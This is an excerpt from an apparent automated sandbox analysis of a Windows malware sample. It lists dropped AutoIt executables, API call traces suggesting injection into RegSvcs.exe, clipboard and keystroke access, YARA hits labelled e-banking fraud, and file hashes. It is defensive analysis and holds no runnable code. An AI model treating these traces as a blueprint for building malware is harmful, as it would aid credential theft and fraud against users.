Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc | Code function: 10_2_00CCA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00CCA0FA
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc | Code function: 10_2_00CCA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00CCA488
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc | Code function: 10_2_00CC65F1 FindFirstFileW,FindNextFileW,FindClose,10_2_00CC65F1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc | Code function: 10_2_00C8C642 FindFirstFileExW,10_2_00C8C642
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc | Code function: 10_2_00CC72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_00CC72E9
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc | Code function: 10_2_00CC7248 FindFirstFileW,FindClose,10_2_00CC7248
Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe | Code function: 16_2_00C2E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,16_2_00C2E387
Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe | Code function: 16_2_00C2D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00C2D836
Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe | Code function: 16_2_00C2DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00C2DB69
Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe | Code function: 16_2_00C39F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00C39F9F
Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe | Code function: 16_2_00C3A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00C3A0FA
Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe | Code function: 16_2_00C3A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,16_2_00C3A488
Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe | Code function: 16_2_00C365F1 FindFirstFileW,FindNextFileW,FindClose,16_2_00C365F1
Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe | Code function: 16_2_00BFC642 FindFirstFileExW,16_2_00BFC642
Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe | Code function: 16_2_00C372E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,16_2_00C372E9
Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe | Code function: 16_2_00C37248 FindFirstFileW,FindClose,16_2_00C37248
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc | File opened: C:\Users\user~1\AppData\Local\Temp\RarSFX0\
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc | File opened: C:\Users\user~1\
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc | File opened: C:\Users\user~1\AppData\Local\Temp\
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc | File opened: C:\Users\user~1\AppData\Local\
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc | File opened: C:\Users\user\AppData\Local\Temp\RarSFX0\
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc | File opened: C:\Users\user~1\AppData\
Networking

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc | Code function: 10_2_00CCD7A1 InternetReadFile,SetEvent,GetLastError,SetEvent,10_2_00CCD7A1
Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1474059537.000000000141F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1655745740.0000000001797000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.0.dr, tguujh.msc.exe0.10.dr, tguujh.msc.exe.10.dr, tguujh.msc.10.dr, tguujh.msc.exe.exe.16.dr | String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1474059537.000000000141F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1655745740.0000000001797000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.0.dr, tguujh.msc.exe0.10.dr, tguujh.msc.exe.10.dr, tguujh.msc.10.dr, tguujh.msc.exe.exe.16.dr | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1474059537.000000000141F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1655745740.0000000001797000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.0.dr, tguujh.msc.exe0.10.dr, tguujh.msc.exe.10.dr, tguujh.msc.10.dr, tguujh.msc.exe.exe.16.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1474059537.000000000141F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1655745740.0000000001797000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.0.dr, tguujh.msc.exe0.10.dr, tguujh.msc.exe.10.dr, tguujh.msc.10.dr, tguujh.msc.exe.exe.16.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1474059537.000000000141F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1655745740.0000000001797000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.0.dr, tguujh.msc.exe0.10.dr, tguujh.msc.exe.10.dr, tguujh.msc.10.dr, tguujh.msc.exe.exe.16.dr | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1474059537.000000000141F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1655745740.0000000001797000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.0.dr, tguujh.msc.exe0.10.dr, tguujh.msc.exe.10.dr, tguujh.msc.10.dr, tguujh.msc.exe.exe.16.dr | String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1474059537.000000000141F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1655745740.0000000001797000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.0.dr, tguujh.msc.exe0.10.dr, tguujh.msc.exe.10.dr, tguujh.msc.10.dr, tguujh.msc.exe.exe.16.dr | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1474059537.000000000141F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1655745740.0000000001797000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.0.dr, tguujh.msc.exe0.10.dr, tguujh.msc.exe.10.dr, tguujh.msc.10.dr, tguujh.msc.exe.exe.16.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1474059537.000000000141F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1655745740.0000000001797000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.0.dr, tguujh.msc.exe0.10.dr, tguujh.msc.exe.10.dr, tguujh.msc.10.dr, tguujh.msc.exe.exe.16.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1474059537.000000000141F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1655745740.0000000001797000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.0.dr, tguujh.msc.exe0.10.dr, tguujh.msc.exe.10.dr, tguujh.msc.10.dr, tguujh.msc.exe.exe.16.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1474059537.000000000141F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1655745740.0000000001797000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.0.dr, tguujh.msc.exe0.10.dr, tguujh.msc.exe.10.dr, tguujh.msc.10.dr, tguujh.msc.exe.exe.16.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1474059537.000000000141F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp, tguujh.msc.exe, 00000010.00000002.1734578720.0000000000C95000.00000002.00000001.01000000.0000000D.sdmp, tguujh.msc.exe, 00000010.00000003.1655745740.0000000001797000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.0.dr, tguujh.msc.exe0.10.dr, tguujh.msc.exe.10.dr, tguujh.msc.10.dr, tguujh.msc.exe.exe.16.dr | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1474059537.000000000141F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1655745740.0000000001797000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.0.dr, tguujh.msc.exe0.10.dr, tguujh.msc.exe.10.dr, tguujh.msc.10.dr, tguujh.msc.exe.exe.16.dr | String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1474059537.000000000141F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1655745740.0000000001797000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.0.dr, tguujh.msc.exe0.10.dr, tguujh.msc.exe.10.dr, tguujh.msc.10.dr, tguujh.msc.exe.exe.16.dr | String found in binary or memory: https://www.globalsign.com/repository/0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CCF45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,10_2_00CCF45C
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CCF6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_00CCF6C7
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00C3F6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,16_2_00C3F6C7
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CCF45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,10_2_00CCF45C
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc | Code function: 10_2_00CBA54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc | Code function: 10_2_00CE9ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe | Code function: 16_2_00C59ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                E-Banking Fraud

                Source: Yara match | File source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000F.00000002.2027536696.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.2027256382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_0042CCE3 NtClose
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED2C70 NtFreeVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED2DF0 NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED35C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED4340 NtSetContextThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED4650 NtSuspendThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED2AF0 NtWriteFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED2AD0 NtReadFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED2AB0 NtWaitForSingleObject
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED2BE0 NtQueryValueKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED2BF0 NtAllocateVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED2BA0 NtEnumerateValueKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED2B80 NtQueryInformationFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED2B60 NtClose
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED2CF0 NtOpenProcess
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED2CC0 NtQueryVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED2CA0 NtQueryInformationToken
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED2C60 NtCreateKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED2C00 NtQueryInformationProcess
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED2DD0 NtDelayExecution
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED2DB0 NtEnumerateKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED2D30 NtUnmapViewOfSection
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED2D00 NtSetInformationFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED2D10 NtMapViewOfSection
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED2EE0 NtQueueApcThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED2EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED2E80 NtReadVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED2E30 NtWriteVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED2FE0 NtCreateFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED2FA0 NtQuerySection
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED2FB0 NtResumeThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED2F90 NtProtectVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED2F60 NtCreateProcessEx
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED2F30 NtCreateSection
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED3090 NtSetValueKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED3010 NtOpenDirectoryObject
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED39B0 NtGetContextThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED3D70 NtOpenThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00ED3D10 NtOpenProcessToken
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe | Code function: 0_2_00999B5C _wcslen,CreateFileW,CloseHandle,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc | Code function: 10_2_00CB1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc | Code function: 10_2_00CBF122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe | Code function: 16_2_00C2F122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F19C3215_2_00F19C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBFDC015_2_00EBFDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F57D7315_2_00F57D73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA3D4015_2_00EA3D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F51D5A15_2_00F51D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA9EB015_2_00EA9EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E63FD515_2_00E63FD5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E63FD215_2_00E63FD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F5FFB115_2_00F5FFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA1F9215_2_00EA1F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F5FF0915_2_00F5FF09
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_3_017DAA50
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_3_01793E48
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_3_017DBB20
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_3_01794F18
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_3_017DC2F0
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_3_017DC2F2
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_3_017956E8
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_3_017956EA
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_3_017DB2E0
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_3_017946D8
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_3_017DB2D9
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_3_017946D1
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_3_017DC790
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_3_01795B88
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_2_00BDE0BE
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_2_00BE8037
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_2_00BE2007
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_2_00BCE1A0
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_2_00BFA28E
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_2_00BE22C2
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_2_00BC225D
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_2_00BDC59E
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_2_00C4C7A3
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_2_00BFE89F
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_2_00C3291A
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_2_00BF6AFB
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_2_00C28B27
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_2_00BECE30
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_2_00C551D2
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_2_00BF7169
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_2_00BC9240
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_2_00BC9499
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_2_00BE1724
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_2_00BE1A96
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_2_00BE7BAB
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_2_00BC9B60
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_2_00BE7DDA
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_2_00BE1D40
                Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc 98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc.exe 98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc Code function: String function: 00C6FD60 appears 40 times
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc Code function: String function: 00C70DC0 appears 46 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 00EE7E54 appears 102 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 00E8B970 appears 275 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 00F1F290 appears 105 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 00ED5130 appears 58 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 00F0EA12 appears 86 times
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Code function: String function: 009B57D8 appears 67 times
